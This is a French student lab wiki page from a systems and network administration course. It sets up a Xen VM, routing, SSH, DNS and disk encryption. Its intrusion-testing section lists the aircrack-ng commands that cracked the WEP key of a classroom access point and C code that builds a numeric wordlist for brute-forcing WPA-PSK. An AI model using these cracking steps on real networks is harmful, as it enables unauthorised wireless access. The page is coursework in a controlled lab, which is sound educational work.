TP sysres IMA5sc 2020/2021 G3 : Différence entre versions

De Wiki d'activités IMA
(DNS)
(DNS)
Ligne 106 : Ligne 106 :
 
- pour vérifier :
 
- pour vérifier :
 
  host -tany clavaire.site
 
  host -tany clavaire.site
 +
 +
Ajout du certificat SSL
 +
 +
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé
 +
 +
La commande est disponible par mail: simoninrichard@gmail.com
 +
 +
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier
  
 
== Tests d’intrusion ==
 
== Tests d’intrusion ==

Version du 16 novembre 2020 à 16:23

TP PRA - SIMONIN/MERTZ - Clavaire

Informations générales

Hostname : Clavaire
IP local : 100.64.0.25/28
IP publique : 193.48.57.178/28
URL : clavaire.site

Installation VirtualMachine

Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info

xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster

Lancement de la VM puis connexion :

xl create -c /etc/xen/clavaire.cfg
xen console clavaire

Pour quitter la VM : CTRL + ]

On ajoute des disques à notre VM :

//rename disque et formatage (lvrename/mkfs)

//modif .cfg pour ajouter disques

//transfert fichier /var vers nouvelle partition

//ajoute au /etc/fstab les disques

//mount -a


Routage du site IPv4

Dans VM : /etc/network/interfaces

iface eth0 inet static

address 193.48.57.186
netmask 255.255.255.255
up ip address add dev eth0 100.64.0.26/24
up ip route add default via 100.64.0.2 src 193.48.57.186
down ip address del dev eth0 100.64.0.26/24
down ip route del default via 100.64.0.2 src 193.48.57.186

Dans gateway

1. ssh zabeth09 et zabeth30

2. minicom -> /dev/ttyACM0 et /dev/ttyUSB0

3. enable

4. conf t

5. ip route 193.48.57.186 255.255.255.255 100.64.0.26

6. exit

7. write

Services Internet

SSH

modif /etc/ssh/sshd_config :

Changement port : PORT 2222
Login depuis root : PermitRootLogin yes

service ssh restart

on peut donc : ssh root@193.48.57.186 -p 2222

DNS

Ajout DNS :

- le faire dans gandi - modifier fichier /etc/bind/named.conf.local en ajoutant :

zone "clavaire.site" IN {
	type master;
	file "/etc/bind/db.clavaire.lan";
};

- puis avoir un ficher db.clavaire.lan :

;
; BIND data file for local loopback interface
;
$TTL    604800
@       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (
                              8         ; Serial
                         604800         ; Refresh
                          86400         ; Retry
                        2419200         ; Expire
                         604800 )       ; Negative Cache TTL
;
@       IN      NS      ns1.clavaire.site.
@       IN      NS      ns6.gandi.net.
@       IN      MX      100 clavaire.site.
ns1     IN      A       193.48.57.186
www     IN      A       193.48.57.186

- relancer bind :

service bind9 restart

- pour vérifier :

host -tany clavaire.site

Ajout du certificat SSL

Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé

La commande est disponible par mail: simoninrichard@gmail.com

Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier

Tests d’intrusion

Cassage de clef WEP d’un point d’accès WiFi

Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.

Dans un premier temps nous avons annalysé nos interfaces avec

airmon-ng

Le résultat obtenue est

PHY	 Interface	Driver		Chipset
phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370

Nous obtenons ainsi l'interface de la clé WI-PI. Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.

airmon-ng start wlx40a5ef0f6518 3

Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.

aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande

airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518

En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès

aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518

Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP

aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap 

et nous obtenons notre clé pour la cracotte03

KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] 
Decrypted correctly: 100%

Exploitation de failles du système

Cassage de mot de passe WPA-PSK par force brute

Code c pour générer le dictionnaire :

#include <stdio.h>
#include <stdlib.h>

int main(){
    FILE *f;
    f = fopen("fichierbruteforce.txt","w");
    if(f==NULL){
        printf("Erreur lors de l'ouverture c'un fichier");
        exit(1);
    }

    for(char a=0; a<10;a++)
    {
        for(char z=0; z<10;z++)
        {
            for(char e=0; e<10;e++)
            {
                for(char r=0; r<10;r++)
                {
                    for(char t=0; t<10;t++)
                    {
                        for(char y=0; y<10;y++)
                        {
                            for(char u=0; u<10;u++)
                            {
                                for(char i=0; i<10;i++)
                                {
                                    //printf("%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
                                    fprintf(f,"%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
                                }
                            }
                        }
                    }
                }
            }
        }
    }
    fclose(f);
    return 0;
}

Attaque de type "homme au milieu" par usurpation ARP

Intrusion sur un serveur d’application Web

Réalisations

Chiffrement de données

Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:

df -h

Nous connaissons ainsi notre Filesystem:

fdisk /dev/sdb

Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.


Puis nous quittons fdisk mais nous devons exécuter la commande

partprobe 

Pour re-écrire dans la table de partition.

Nous commençons l'initialisations de notre clé cryptée

sudo cryptsetup luksFormat  /dev/sdb1
sudo cryptsetup luksOpen /dev/sdb1 home

Nous pouvons accéder à notre clé depuis

cd /media/pifou/665....62/

Nous avons créé un fichier test en sudo à la racine.

sudo cryptsetup luksClose home 

Cette commande permet de fermer notre clé cryptée.

Site Web

Achat de clavaire.site[1] sur gandi

Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.